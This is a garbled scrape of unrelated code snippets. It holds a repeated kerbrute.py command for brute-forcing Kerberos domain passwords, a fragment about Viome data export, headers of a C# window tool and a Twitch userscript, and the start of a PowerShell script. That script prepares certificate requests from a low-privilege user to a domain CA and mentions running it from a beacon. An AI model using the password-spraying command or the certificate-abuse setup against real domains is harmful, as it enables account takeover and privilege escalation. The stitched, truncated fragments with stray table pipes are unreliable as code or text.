With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
Since Viome doesn't appear to offer us a way to export our data aside from as a PDF, I was inspired to have a look if I could see it any other way.
The CEO says that they don't release the raw data:
/* tiny tool to move all Windows to the main Screen | |
* https://tcpip.wtf/en/rescreen-tool-to-move-all-windows-to-your-win-main-screen.htm | |
*/ | |
using System; | |
using System.Diagnostics; | |
using System.Runtime.InteropServices; | |
namespace rescreen | |
{ | |
class Program |
// ==UserScript== | |
// @name Twitch Bonus Auto Claimer | |
// @namespace https://github.com/BOLL7708 | |
// @homepageURL https://gist.github.com/BOLL7708/29fe3599000003473c49bb1d62ba1d33 | |
// @downloadURL https://gist.github.com/BOLL7708/29fe3599000003473c49bb1d62ba1d33/raw/twitch-bonus-auto-claimer.js | |
// @match *://twitch.tv/* | |
// @match *://www.twitch.tv/* | |
// @grant GM_getValue | |
// @grant GM_setValue | |
// @version 1.0 |
#Thank you @NotMedic for troubleshooting/validating stuff! | |
$password = Read-Host -Prompt "Enter Password" | |
#^^ Feel free to hardcode this for running in a beacon/not retyping it all the time! | |
$server = "admin" #This will just decide the name of the cert request files that are created. I didn't want to change the var name so it's server for now. | |
$CERTPATH = "C:\Users\lowpriv\Desktop\" #Where do you want the cert requests to be stored? | |
$CAFQDN = "dc01.alexlab.local" #hostname of underlying CA box. | |
$CASERVER = "alexlab-dc01-ca" #CA name. | |
$CA = $CAFQDN + "\" + $CASERVER |